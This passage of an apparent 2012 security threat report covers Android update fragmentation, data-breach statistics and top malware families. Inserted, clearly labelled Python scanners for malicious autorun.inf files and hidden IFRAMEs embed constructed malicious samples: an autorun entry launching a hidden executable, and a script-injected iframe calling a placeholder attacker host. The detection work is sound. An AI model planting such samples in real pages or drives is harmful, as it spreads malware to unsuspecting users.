certain notification and even block that app from pushing<br />
notifications.<br />
• Owing to the rise of threats that silently send premium text<br />
messages (Opfake, Premiumtext, Positmob, Rufraud, etc.),<br />
Google added in 4.2 a feature to prompt the user to confirm<br />
sending such premium text messages (they compiled a<br />
list of ranges of short-code numbers for many countries).<br />
This can be very helpful in protecting most users; however,<br />
Android 4.2 devices accounted for only 1.4 percent of users at<br />
the time of writing. 9<br />
We haven’t seen a large number of Android vulnerabilities in<br />
2012, and phone manufacturers pushed (over the air) updates<br />
for the more serious ones. The Android ecosystem makes it<br />
more challenging to keep everyone up to date. Google controls<br />
the official reference platform that works out of the box only<br />
on Nexus devices. From there each manufacturer modifies<br />
and releases its own platform updates, which are picked up by<br />
mobile network operators, which in turn also customize for their<br />
platforms.<br />
This makes it very difficult for any change coming from Google<br />
to be pushed out quickly to in-the-field devices. Any change to<br />
the platform requires thorough testing, which is performed by<br />
each manufacturer and operator, all adding to the time required<br />
to deploy to the end users.<br />
Having so many device models also multiplies the amount of<br />
resources all these companies have to allocate for each update,<br />
which may partly explain why these updates are infrequently<br />
released. Another factor is that the newest platforms are<br />
optimized for the latest, more powerful hardware, which could<br />
actually degrade the performance on older models if pushed<br />
out universally. Of course, some commentators argue that<br />
manufacturers and operators are not really motivated to release<br />
so many updates in order to encourage people to purchase<br />
the newer phones, but we cannot comment on this. For most<br />
exploits in the OS, Google quickly releases the fixes, but it still<br />
entails a long time for most users to receive the appropriate fix<br />
for their device from their network operators.<br />
Some exploits are not in the original OS itself, but in the custom<br />
modifications made by manufacturers, such as the recent<br />
Samsung exploit for Galaxy S2/S3, Note, etc. Although they were<br />
quick to fix it, the fix still had to propagate through network<br />
operators to reach users. In the event that a major vulnerability<br />
appeared that was being exploited in huge numbers of older<br />
versions of Android, we don’t think Google (or the phone<br />
manufacturers) would have any choice but to release an OTA<br />
patch for it. The question is whether it would reach all Android<br />
users, and how long it would take.<br />
Tighter control from Google over the platform may resolve some<br />
of the “fragmentation” issues, but this could have a knock-on<br />
effect and in turn impact the relationship it has with the device<br />
manufacturers. And there is an argument about drawing a line<br />
and forcing a cut-off point for older Android users, but it is<br />
usually the manufacturers that determine this; they are the ones<br />
to say whether or not they will continue to upgrade a particular<br />
model to support a newer version of Android. As devices pass<br />
their end-of-life support period, they may still be usable and<br />
adequately functional, but they are unlikely to receive support<br />
from the manufacturers in terms of updates and patches. In<br />
general, Google would only have to win from having most users<br />
using up-to-date versions of Android, but with the current<br />
model, they may not have much say in the matter.
Data Breaches that Could Lead to Identity Theft<br />
Background<br />
Hacking continued to be the primary way data breaches occurred<br />
in 2012, in much the same way as it was in 2011. However, where<br />
politically motivated hacktivism in 2011 resulted in some of the<br />
biggest data breaches we’ve seen, such activity waned somewhat<br />
in 2012. This is most apparent when looking at the biggest<br />
caches of stolen identities. In 2011, there were five data breaches<br />
that netted hackers 10 million or more identities, the largest of<br />
which was a massive breach of 70 million identities. In contrast,<br />
2012 saw only one breach larger than 10 million identities.<br />
As a result the overall average size of breaches has dropped<br />
significantly, down from 1.1 million to 604,826 identities per<br />
breach.<br />
That’s not to say that the threat posed by data breaches has<br />
dropped in the last year. While the average size has declined, the<br />
median number of identities stolen is up, and significantly at<br />
that. Where the median number of identities stolen was 2,400<br />
per breach in 2011, this number is up to 8,350 in 2012. That’s<br />
an increase of around 3.5 times. Using the median is a useful<br />
measure because it ignores the extremes, the rare events that<br />
resulted in large numbers of identities being exposed, and is<br />
more representative of the underlying trend.<br />
There were many high-profile hacking breaches last year that<br />
received lots of media attention for obvious reasons. Hacking<br />
can undermine institutional confidence in a company, and<br />
loss of personal data can result in damage to an organization’s<br />
reputation. Despite the media hype around these breaches,<br />
hacking came in second to old-fashioned theft as the greatest<br />
source of data breaches last year according to the Norton<br />
Cybercrime Index data. 10 In the event of a data breach, many<br />
countries have existing data breach notification legislation<br />
that regulates the responsibilities of organizations conducting<br />
business after a data breach has occurred.<br />
Methodology<br />
The data for the data breaches that could lead to identity theft<br />
is procured from the Norton Cybercrime Index (CCI). The Norton<br />
CCI is a statistical model that measures the levels of threats,<br />
including malicious software, fraud, identity theft, spam,<br />
phishing, and social engineering daily. The majority of the<br />
Norton CCI’s data comes from Symantec’s Global Intelligence<br />
Network, one of the industry’s most comprehensive sources of<br />
intelligence about online threats. 11 The data breach section of<br />
the Norton CCI is derived from data breaches that have been<br />
reported by legitimate media sources and have exposed personal<br />
information, including name, address, Social Security numbers,<br />
credit card numbers, or medical history. Using publicly available<br />
data, the Norton CCI determines the sectors that were most<br />
often affected by data breaches, as well as the most common<br />
causes of data loss.<br />
The sector that experienced the loss along with the cause of loss<br />
that occurred is determined through analysis of the organization<br />
reporting the loss and the method that facilitated the loss.<br />
The data also reflects the severity of the breach by measuring<br />
the total number of identities exposed to attackers, using the<br />
same publicly available data. An identity is considered to be<br />
exposed if personal or financial data related to the identity<br />
is made available through the data breach. Data may include<br />
names, government-issued identification numbers, credit card<br />
information, home addresses, or email information. A data<br />
breach is considered deliberate when the cause of the breach is<br />
due to hacking, insider intervention, or fraud. A data breach is<br />
considered to be caused by hacking if data related to identity<br />
theft was exposed by attackers, external to an organization,<br />
gaining unauthorized access to computers or networks. (Hacking<br />
is an intentional act with the objective of stealing data that can<br />
be used for purposes of identity theft or other fraud.)<br />
It should be noted that some sectors may need to comply with<br />
more stringent reporting requirements for data breaches than<br />
others do. For instance, government organizations are more likely<br />
to report data breaches, either due to regulatory obligations or<br />
in conjunction with publicly accessible audits and performance<br />
reports. 12 Conversely, organizations that rely on consumer<br />
confidence may be less inclined to report such breaches for fear<br />
of negative consumer, industry, or market reaction. As a result,<br />
sectors that are not required or encouraged to report<br />
data breaches may be under-represented in this data set.
Figure A.24. Timeline of Data Breaches Showing Identities Breached in 2012, Global<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
[Chart: monthly sum of identities breached (millions, y-axis 0–35) together with the number of incidents, Jan to Dec 2012. Monthly sums recoverable from the extracted text: Jan 31, Feb 1, Mar 0.1, Apr 3, May 1, Jun 8, Jul 13, Aug 4 million; the values for Sep to Dec cannot be reliably paired with their months.]<br />
Data and Commentary for Data Breaches that Could Lead to Identity Theft by Sector<br />
Figure A.25. Data Breaches that Could Lead to Identity Theft (Top 10 Sectors by Number of Data Breaches)<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Sector | % of Data Breaches<br />
Healthcare | 36%<br />
Education | 16%<br />
Government | 13%<br />
Accounting | 9%<br />
Computer Software | 6%<br />
Financial | 6%<br />
Information Technology | 5%<br />
Telecommunications | 4%<br />
Computer Hardware | 3%<br />
Community and Non-profit | 3%<br />
[A companion bar chart, Number of Incidents (y-axis 0–35), is not reproduced in the extracted text.]<br />
• Healthcare and education sectors ranked top for number of data breaches, making up just over 50 percent of all data breaches. However, retail and the government sectors represent more than half of the identities exposed.<br />
• This indicates that the sectors responsible for the most data breaches don’t necessarily result in the largest caches of stolen identities.<br />
Figure A.25. Data Breaches that Could Lead to Identity Theft (Top 10 Sectors by Number of Identities Exposed)<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Retail 27%; Government 24%; Computer Hardware 14%; Telecommunications 10%; Computer Software 9%; Accounting 7%; Financial 3%; Healthcare 2%; Information Technology 2%; Social Networking 2%<br />
Figure A.26. Average Number of Identities Exposed Per Data Breach by Notable Sector<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
[Bar chart, millions of identities per breach, for Retail, Telecom, Accounting, Government, Social Networking, Financial, Computer Software, Information Tech, Hospitality, and Computer Hardware; the Retail bar is the highest, at about 12 million.]<br />
The largest number of identities exposed per breach in 2012 occurred in the retail sector, where one breach topped 10 million identities.
Data and Commentary for Data Breaches that Could Lead to Identity Theft by Cause<br />
Figure A.27. Data Breaches that Could Lead to Identity Theft by Number of Breaches<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Hackers 40%; Accidentally Made Public 23%; Theft or Loss of Computer or Drive 23%; Insider Theft 8%; Unknown 6%; Fraud 0.6%<br />
Figure A.27. Data Breaches that Could Lead to Identity Theft by Number of Identities Exposed<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Hackers 79%; Theft or Loss of Computer or Drive 23%; Accidentally Made Public 3%; Unknown 1%; Insider Theft 0.3%<br />
• Hackers were the top cause of data breaches: the most frequent cause of data breaches (across all sectors) that could facilitate identity theft in 2012 was hacking, which accounted for 40 percent of breaches that could lead to identities being exposed, equating to approximately 18.5 million identities exposed in total.
Figure A.28. Average Number of Identities Exposed Per Data Breach by Cause<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
[Bar chart by cause: Theft or Loss of Computer or Drive, Hackers, Unknown, Accidentally Made Public, Insider Theft, Fraud. Hackers average 1,192,092 identities per breach; the other labelled bars read 138,295, 77,028 and 21,801.]<br />
Threat Activity Trends Endnotes<br />
01 Internet population and penetration rates in 2012 courtesy of Internet World Stats http://www.internetworldstats.com.<br />
02 See http://www.symantec.com/<strong>security</strong>_response/writeup.jsp?docid=2012-012709-4046-99.<br />
03 See http://www.symantec.com/connect/blogs/update-androidcounterclank.<br />
04 For more details about Norton Safe Web, please visit http://safeweb.norton.com/.<br />
05 For more details about Symantec Rulespace, please visit http://www.symantec.com/theme.jsp?themeid=rulespace.<br />
06 Command and control.<br />
07 International Mobile Equipment Identity.<br />
08 International Mobile Subscriber Identity.<br />
09 See http://developer.android.com/about/dashboards/index.html.<br />
10 See http://www.nortoncybercrimeindex.com/.<br />
11 See http://www.idanalytics.com/.<br />
12 For example, the US Fair and Accurate Credit Transactions Act of 2003 (FACTA). For more on this act, please see<br />
http://www.privacyrights.org/fs/fs6a-facta.htm. Another example is the Health Insurance Portability and Accountability Act of<br />
1996. For more information see: http://www.cms.hhs.gov/HIPAAGenInfo/.
APPENDIX :: B<br />
MALICIOUS CODE TRENDS<br />
Malicious Code Trends<br />
Symantec collects malicious code information from our large global customer base through<br />
a series of opt-in anonymous telemetry programs, including Norton Community Watch,<br />
Symantec Digital Immune System, and Symantec Scan and Deliver technologies. Well over<br />
133 million clients, servers, and gateway systems actively contribute to these programs. New<br />
malicious code samples, as well as detection incidents from known malicious code types, are<br />
reported back to Symantec. These resources give Symantec’s analysts unparalleled sources<br />
of data with which to identify, analyze, and provide informed commentary on emerging<br />
trends in malicious code activity in the threat landscape.<br />
Reported incidents are considered potential infections if an infection could have occurred in<br />
the absence of <strong>security</strong> software to detect and eliminate the threat.<br />
In this section, the following malicious code trends are analyzed for 2012:<br />
• Top Malicious Code Families<br />
• Analysis of Malicious Code Activity by Geography, Industry Sector, and Company Size<br />
• Propagation Mechanisms<br />
• Industrial Espionage: Targeted Attacks and Advanced Persistent Threats (APTs)
Top Malicious Code Families<br />
Background<br />
Malicious code threats are classified into four main types—<br />
backdoors, viruses, worms, and Trojans:<br />
• Backdoors allow an attacker to remotely access<br />
compromised computers.<br />
• Viruses propagate by infecting existing files on affected<br />
computers with malicious code.<br />
• Worms are malicious code threats that can replicate on<br />
infected computers or in a manner that facilitates them<br />
being copied to another computer (such as via USB storage<br />
devices).<br />
• Trojans are malicious code that users unwittingly install<br />
onto their computers, most commonly through either<br />
opening email attachments or downloading from the<br />
Internet. Trojans are often downloaded and installed by<br />
other malicious code as well. Trojan horse programs differ<br />
from worms and viruses in that they do not propagate<br />
themselves.<br />
Many malicious code threats have multiple features; for<br />
example, a backdoor will always be categorized in conjunction<br />
with another malicious code feature. Typically, backdoors are<br />
also Trojans; however, many worms and viruses also incorporate<br />
backdoor functionality. In addition, many malicious code<br />
samples can be classified as both worm and virus due to the way<br />
they propagate. One reason for this is that threat developers<br />
try to enable malicious code with multiple propagation vectors<br />
in order to increase their odds of successfully compromising<br />
computers in attacks.<br />
Symantec analyzes new and existing malicious code families<br />
to determine which threat types and attack vectors are being<br />
employed in the most prevalent threats. This information also<br />
allows system administrators and users to gain familiarity with<br />
threats that attackers may favor in their exploits. Insight into<br />
emerging threat development trends can help them to bolster<br />
<strong>security</strong> measures and mitigate future attacks.<br />
The endpoint is often the last line of defense; however, it can also be<br />
the first line of defense against attacks that spread using USB storage<br />
devices and insecure network connections. The threats found there shed<br />
light on the wider nature of threats confronting businesses, especially<br />
blended attacks and threats facing mobile workers. Attacks reaching the<br />
endpoint are likely to have already circumvented other layers of<br />
protection that may be deployed, such as gateway or cloud-based filtering.<br />
Methodology<br />
A malicious code family initially consists of a single distinct<br />
malicious code sample. As variants of that sample are released,<br />
the family grows to include multiple variants. Symantec<br />
determines the most prevalent malicious code families by<br />
collating and analyzing anonymous telemetry data gathered for<br />
the reporting period.<br />
Malicious code family rankings tend to be weighted towards file-infecting<br />
threats due to their nature. These threats tend to infect<br />
large numbers of executable files in the hopes that they will<br />
spread or be shared out to other computers. This propagation<br />
approach increases their overall presence when looking at<br />
the total number of malicious files in the threat landscape. In<br />
contrast, a threat like a Trojan, which doesn’t use automatic<br />
propagation techniques, will not rank as highly. As a result,<br />
malicious code families that include file-infecting functionality<br />
are picked up by antivirus sensors more frequently and will rank<br />
higher in overall numbers.<br />
Overall, the top ten list of malicious code families accounted for<br />
41.2 percent of all potential infections blocked in 2012.
Figure B.1. Overall Top Malicious Code Families, 2012<br />
Source: Symantec<br />
Rank, name, type and share of potential infections, with propagation mechanisms and impacts/features:<br />
1. W32.Ramnit (Virus/Worm; 15.4% overall). Propagation: executable files and removable drives. Impact: infects various file types, including executable files, and copies itself to removable drives. It then relies on AutoPlay functionality to execute when the removable drive is accessed on other computers.<br />
2. W32.Sality (Virus/Worm; 7.6%). Propagation: executable files and removable drives. Impact: uses polymorphism to evade detection. Once running on an infected computer, it infects executable files on local, removable, and shared network drives. It then connects to a P2P botnet and downloads and installs additional threats. The virus also disables installed security software.<br />
3. W32.Downadup (Worm/Backdoor; 5.4%). Propagation: P2P/CIFS/remote vulnerability. Impact: the worm disables security applications and Windows Update functionality and allows remote access to the infected computer. It exploits vulnerabilities to copy itself to shared network drives. It also connects to a P2P botnet and may download and install additional threats.<br />
4. W32.Virut (Virus/Backdoor; 3.7%). Propagation: executables. Impact: infects various file types, including executable files, and copies itself to local, removable, and shared network drives. It also establishes a backdoor that may be used to download and install additional threats.<br />
5. W32.SillyFDC (Worm; 3.1%). Propagation: removable drives. Impact: downloads additional threats and copies itself to removable drives. It then relies on AutoPlay functionality to execute when the removable drive is accessed on other computers.<br />
6. W32.Almanahe (Virus/Worm; 2.1%). Propagation: CIFS/mapped drives/removable drives/executables. Impact: disables security software by ending related processes. It also infects executable files and copies itself to local, removable, and shared network drives. The worm may also download and install additional threats.<br />
7. W32.Mabezat (Virus/Worm; 1.5%). Propagation: SMTP/CIFS/removable drives. Impact: copies itself to local, removable, and shared network drives. Infects executables and encrypts various file types. It may also use the infected computer to send spam email containing infected attachments.<br />
8. W32.Chir (Worm; 1.2%). Propagation: SMTP engine. Impact: searches across the network and accesses files on other computers. However, due to a bug, these files are not modified in any way.<br />
9. W32.Changeup (Worm; 0.6%). Propagation: removable and mapped drives/file sharing programs/Microsoft vulnerability. Impact: the primary function of this threat is to download more malware on to the compromised computer. It is likely that the authors of the threat are associated with affiliate schemes that are attempting to generate money through the distribution of malware.<br />
10. W32.Xpaj (Virus; 0.6%). Propagation: executables/removable, mapped, and network drives. Impact: infects .dll, .exe, .scr, and .sys files on the compromised computer.<br />
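Three of the families in Figure B.1 (Ramnit, Sality, SillyFDC) depend on an AUTORUN.INF dropped at the root of removable media. The following script is an added example for this section, not code from the report or from Symantec: it parses an autorun.inf, lists the entries that would make AutoRun launch something, and flags the tell-tale signs these families share, namely a launch target that is an executable, a target hidden in a folder such as RECYCLER or $RECYCLE.BIN, and an "action" string that imitates the stock Windows AutoPlay prompt. Both autorun.inf samples are constructed for the example; the SID-style folder name and the file name update.exe are illustrative and do not come from a real sample.

```python
import os
import re

# Keys inside [autorun] that make AutoRun/AutoPlay launch a program.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.IGNORECASE)
EXEC_EXT = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "vbe", "js", "jse", "wsf"}
# Drop locations favoured by removable-drive worms: hidden from a casual Explorer view.
HIDDEN_DIRS = ("recycler", "$recycle.bin", "recycled", "system volume information")
# Action text that imitates the stock Windows AutoPlay entry so the user picks the malware.
LURE_ACTIONS = ("open folder to view files",)

# Constructed sample in the style of a Ramnit/Sality/SillyFDC drop (hypothetical names).
SAMPLE_AUTORUN = r"""[autorun]
open=RECYCLER\S-1-5-21-0-0-0-1000\update.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open\command=RECYCLER\S-1-5-21-0-0-0-1000\update.exe
shell\explore\command=RECYCLER\S-1-5-21-0-0-0-1000\update.exe
UseAutoPlay=1
"""

# Constructed benign sample: a vendor disc that only sets an icon and a label.
BENIGN_AUTORUN = r"""[autorun]
icon=setup.ico
label=Vendor Installer
"""


def parse_autorun(text):
    """Return the [autorun] section as {key: value}; keys are lower-cased."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def analyze_autorun(text):
    """Collect launch entries, explain why each looks malicious, and give a verdict."""
    entries = parse_autorun(text)
    launches = {k: v for k, v in entries.items() if LAUNCH_KEY.match(k)}
    reasons = []
    for key, target in launches.items():
        parts = target.strip('"').split()          # first token is the path, rest are args
        path = parts[0].lower() if parts else ""
        ext = path.rsplit(".", 1)[-1] if "." in path else ""
        if ext in EXEC_EXT:
            reasons.append(f"{key} launches executable: {target}")
        if any(d in path for d in HIDDEN_DIRS):
            reasons.append(f"{key} target is in a hidden drop folder: {target}")
    if entries.get("action", "").lower() in LURE_ACTIONS:
        reasons.append(f"action text imitates the Windows AutoPlay prompt: {entries['action']}")
    return {"launches": launches, "reasons": reasons, "suspicious": bool(reasons)}


def scan_volume_root(root):
    """AutoRun only honours autorun.inf at the volume root, so that is all we read."""
    for name in os.listdir(root):
        if name.lower() == "autorun.inf":
            with open(os.path.join(root, name), encoding="latin-1") as fh:
                return analyze_autorun(fh.read())
    return None


if __name__ == "__main__":
    for label, sample in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        result = analyze_autorun(sample)
        print(label, "suspicious" if result["suspicious"] else "clean")
        for reason in result["reasons"]:
            print("  -", reason)
```

Run scan_volume_root() against the mount point of a drive pulled from a suspect machine. Windows 7 and the 2011 AutoRun update for Windows XP and Vista stopped honouring autorun.inf on USB media, so on a patched host a file like the sample above is evidence of an infected drive rather than a working infection vector, but it still identifies the payload path to pull for analysis.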
Figure B.2. Relative Volume of Reports of Top 10 Malicious Code Families in 2012 by Percentage<br />
Source: Symantec<br />
Others<br />
59%<br />
W32.Ramnit<br />
15%<br />
8% W32.Sality<br />
5% W32.Downadup<br />
4% W32.Virut<br />
3% W32.SillyFDC<br />
2% W32.Almanahe<br />
2% W32.Mabezat<br />
1% W32.Chir<br />
1% W32.Changeup<br />
1% W32.Xpaj<br />
Figure B.3. Relative Proportion of Top 10 Malicious Code Blocked in Email Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
Source: Symantec<br />
Rank Malware % of Email Malware Equivalent Ratio in Email<br />
1 Exploit/SpoofBBB 1.58% 1 in 63.4<br />
2 Trojan.Bredolab 1.46% 1 in 68.7<br />
3 EML/Worm.XX.dam 0.85% 1 in 117.5<br />
4 Exploit/SuspLink 0.78% 1 in 127.9<br />
5 Exploit/LinkAliasPostcard-4733 0.66% 1 in 151.0<br />
6 W32/Netsky.C-mm 0.58% 1 in 171.1<br />
7 Trojan.Sasfis.dam 0.53% 1 in 187.5<br />
8 Exploit/Link-FakeACHupdate 0.52% 1 in 190.7<br />
9 Exploit/FakeAttach 0.51% 1 in 194.7<br />
10 W32/Netsky.P-mm 0.51% 1 in 196.7
Figure B.4. Trend of Malicious Code Blocked in Email Traffic by Symantec.cloud – 2011 vs 2012<br />
Source: Symantec.cloud<br />
[Line chart, January to December, ratio scale from 1 in 400 to 1 in 50, one line each for 2011 and 2012.]<br />
Figure B.5. Relative Proportion of Top 10 Malicious Code Blocked in Web Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
Source: Symantec.cloud<br />
Rank Name % of Web Malware Equivalent Ratio in Web Traffic<br />
1 Trojan.JS.Iframe.AOX 10.6% 1 in 9.5<br />
2 Trojan.Iframe.XI 7.1% 1 in 14.2<br />
3 Infostealer.Gampass 5.2% 1 in 19.3<br />
4 Dropped:Rootkit.49324 4.6% 1 in 21.6<br />
5 Exploit.Link-Javascript-4cda 4.4% 1 in 22.9<br />
6 Exploit.Link-Javascript-3f9f 4.0% 1 in 25.1<br />
7 Suspicious.Emit 3.3% 1 in 30.1<br />
8 Trojan.Script.12023 3.2% 1 in 31.5<br />
9 Dropped:Trojan.PWS.OnlineGames.KDVN 3.1% 1 in 32.0<br />
10 W32.Almanahe.B 2.2% 1 in 46.3
Commentary<br />
• Ramnit again beats Sality to become the most prevalent<br />
malicious code family in 2012: the top family by volume of<br />
potential infections in 2012 was Ramnit, which also ranked<br />
first in 2011.<br />
Samples of the Ramnit family of malware were responsible<br />
for significantly more potential infections (15.4 percent)<br />
than the second ranked malicious code family in 2012,<br />
Sality (7.6 percent).<br />
First discovered in 2010, W32.Ramnit has been a prominent<br />
feature of the threat landscape since then, often switching<br />
places with Sality throughout the year as the two families<br />
jockey for first position.<br />
Ramnit spreads by encrypting and then appending itself<br />
to DLL, EXE, and HTML files. It can also spread by copying<br />
itself to the recycle bin on removable drives and creating<br />
an AUTORUN.INF file so that the malware is potentially<br />
automatically executed on other computers. This can occur<br />
when an infected USB device is attached to a computer. The<br />
reliable simplicity of spreading via USB devices and other<br />
media makes malicious code families such as Ramnit, and<br />
Sality (as well as SillyFDC and others) effective vehicles for<br />
installing additional malicious code on computers.<br />
• The Sality family of malware, ranked second, remains<br />
attractive to attackers because it uses polymorphic<br />
code that can hamper detection. Sality is also capable<br />
of disabling <strong>security</strong> services on affected computers.<br />
These two factors may lead to a higher rate of successful<br />
installations for attackers. Sality propagates by infecting<br />
executable files and copying itself to removable drives such<br />
as USB devices. Similar to Ramnit, Sality also relies on<br />
AUTORUN.INF functionality to potentially execute when<br />
those drives are accessed.<br />
• Downadup gains a bit of momentum: Downadup (a.k.a.<br />
Conficker) ranked third by volume of potential infections in<br />
2012, compared with fourth in 2011. Downadup<br />
propagates by exploiting vulnerabilities in order to copy<br />
itself to network shares. Downadup was estimated to have<br />
infected slightly more than 2 million PCs worldwide at the<br />
end of 2012, 1 compared with approximately 3 million at the<br />
end of 2011.<br />
• Overall in 2012, 1 in 281.8 emails was identified as<br />
malicious, compared with 1 in 238.8 in 2011; 22.5 percent<br />
of email-borne malware comprised hyperlinks that<br />
referenced malicious code, in contrast with malware that<br />
was contained in an attachment to the email. This figure<br />
was 39.1 percent in 2010, an indication that cybercriminals<br />
are attempting to circumvent <strong>security</strong> countermeasures<br />
by changing the vector of attacks from purely email to the<br />
Web.<br />
• In 2012, 12.6 percent of malicious code detected was<br />
identified and blocked using generic detection technology.<br />
Many new viruses and Trojans are based on earlier versions,<br />
where code has been copied or altered to create a new strain,<br />
or variant. Often these variants are created using toolkits<br />
and hundreds of thousands of variants can be created from<br />
the same piece of malware. This has become a popular<br />
tactic to evade signature-based detection, as each variant<br />
would traditionally need its own signature to be correctly<br />
identified and blocked. By deploying techniques, such as<br />
heuristic analysis and generic detection, it’s possible to<br />
correctly identify and block several variants of the same<br />
malware families, as well as identify new forms of malicious<br />
code that seek to exploit certain vulnerabilities that can be<br />
identified generically.<br />
• Exploit/SpoofBBB was the most frequently blocked<br />
malware in email traffic by Symantec.cloud in 2012, with<br />
Trojan.Bredolab taking the second position.<br />
• Trojan.JS.Iframe.AOX was the most frequently blocked<br />
malicious activity in Web traffic filtered by Symantec.cloud<br />
in 2012. Detection for a malicious IFRAME is triggered in<br />
HTML files that contain hidden IFRAME elements with<br />
JavaScript code that attempts to perform malicious actions<br />
on the computer; for example, when visiting a malicious<br />
Web page, the code attempts to quietly direct the user to a<br />
malicious URL while the current page is loading.<br />
• Stuxnet in 2012: Despite being developed for a very specific<br />
type of target, the number of reports of potential Stuxnet<br />
infections observed by Symantec in 2012 placed the<br />
worm at a rank beyond 30 among malicious code families,<br />
compared with 18 in 2011. The Stuxnet worm generated<br />
a significant amount of attention in 2010 because it was<br />
the first malicious code designed specifically to attack<br />
Programmable Logic Controller (PLC) industrial control<br />
systems. 2 Notably, Stuxnet was the first malicious code<br />
family that may directly affect the physical world and<br />
proves the feasibility for malicious code to cause potentially<br />
dramatic physical destruction.
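The Trojan.JS.Iframe.AOX bullet above describes the detection condition: an HTML page carrying an IFRAME the visitor cannot see, which pulls a second URL while the page loads. The scanner below is an added example written for this section; it is not Symantec's detection code and is not from the report. It parses HTML for IFRAME elements hidden by zero or one-pixel dimensions or by CSS, and also decodes the common document.write(unescape("%3Ciframe...")) injection so IFRAMEs written by script are caught as well. The sample page and the .invalid hostnames are constructed for the example and are not real indicators.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# CSS that makes an IFRAME invisible or pushes it far off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I)
# Attribute parser for IFRAME tags reconstructed from decoded script strings.
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Constructed page: one visible embed, two hidden IFRAMEs in markup, and one
# written by script through unescape(). Hostnames are placeholders, not IOCs.
SAMPLE_HTML = """<html><body>
<h1>Company news</h1>
<iframe src="https://example.com/video" width="600" height="400"></iframe>
<iframe src="http://bad.invalid/in.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://bad2.invalid/" style="position:absolute; display:none"></iframe>
<script>
document.write(unescape("%3Ciframe%20src%3D%22http%3A//evil.invalid/in.php%22%20width%3D1%20height%3D1%3E%3C/iframe%3E"));
</script>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects IFRAME attribute maps and the full text of each <script> block."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._buf = None                      # non-None while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def _pixels(value):
    """'0', '0px', '1' -> int; a value without digits -> None."""
    digits = re.sub(r"[^\d-]", "", value)
    return int(digits) if digits.lstrip("-").isdigit() else None


def hidden_reasons(attrs):
    """Why this IFRAME would be invisible to the visitor; empty list if it is not."""
    reasons = []
    for dim in ("width", "height"):
        if dim in attrs:
            px = _pixels(attrs[dim])
            if px is not None and px <= 1:
                reasons.append(f"{dim}={attrs[dim]}")
    if HIDDEN_STYLE.search(attrs.get("style", "")):
        reasons.append("hidden by style")
    return reasons


def iframes_from_script(script):
    """Undo unescape()-style %XX encoding and yield attribute maps of any IFRAME tags."""
    decoded = unquote(script)
    for m in re.finditer(r"<iframe\b([^>]*)>", decoded, re.I):
        yield {a.lower(): (b or c or d) for a, b, c, d in ATTR_RE.findall(m.group(1))}


def find_hidden_iframes(html):
    """One finding per hidden IFRAME, whether it sits in markup or is written by script."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        reasons = hidden_reasons(attrs)
        if reasons:
            findings.append({"src": attrs.get("src"), "via": "markup", "reasons": reasons})
    for script in parser.scripts:
        for attrs in iframes_from_script(script):
            reasons = hidden_reasons(attrs)
            if reasons:
                findings.append({"src": attrs.get("src"), "via": "script", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print(f["via"], f["src"], ", ".join(f["reasons"]))
```

The src values it returns are the URLs to pivot on: the injected frame is usually the exploit kit landing page rather than the compromised site itself. A 1x1 frame is treated the same as 0x0 because injections commonly use one pixel to dodge naive zero-size checks; legitimate tracking pixels will therefore show up too and need allow-listing by hostname.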
Analysis of Malicious Code Activity by Geography, Industry Sector, and Company Size<br />
Background<br />
Malicious code activity trends can also reveal patterns that<br />
may be associated with particular geographical locations, or<br />
hotspots. This may be a consequence of social and political<br />
changes in the region, such as increased broadband penetration<br />
and increased competition in the marketplace that can drive<br />
down prices, increasing adoption rates. Of course, there may<br />
also be other factors at work, based on the local economic<br />
conditions that may present different risk factors. Similarly, the<br />
industry sector may also have an influence on an organization’s<br />
risk factor, where certain industries may be exposed to different<br />
levels of threat, by the nature of their business.<br />
Moreover, the size of an organization can also play a part in determining their exposure to risk. Small to medium-sized businesses (SMBs) may find themselves the target of a malicious attack by virtue of the relationships they have with other organizations; for example, a company may be subjected to an attack because they are a supplier to a larger organization, and attackers may seek to take advantage of this relationship in forming the social engineering behind subsequent attacks on the main target, using the SMB as a springboard for these later attacks. SMBs are perceived to be a softer target because they are less likely to have the same levels of in-depth defenses as a larger organization, which is more likely to have greater budgetary expenditure applied to its security countermeasures.<br />
Methodology<br />
Analysis of malicious code activity based on geography, industry, and size is based on telemetry from Symantec.cloud clients for threats detected and blocked against those organizations in email traffic during 2012. This analysis looks at the profile of organizations being subjected to malicious attacks, in contrast to the source of the attack.<br />
Data<br />
Figure B.6. Proportion of Email Traffic Identified as Malicious by Industry Sector, 2012<br />
Source: Symantec.cloud<br />
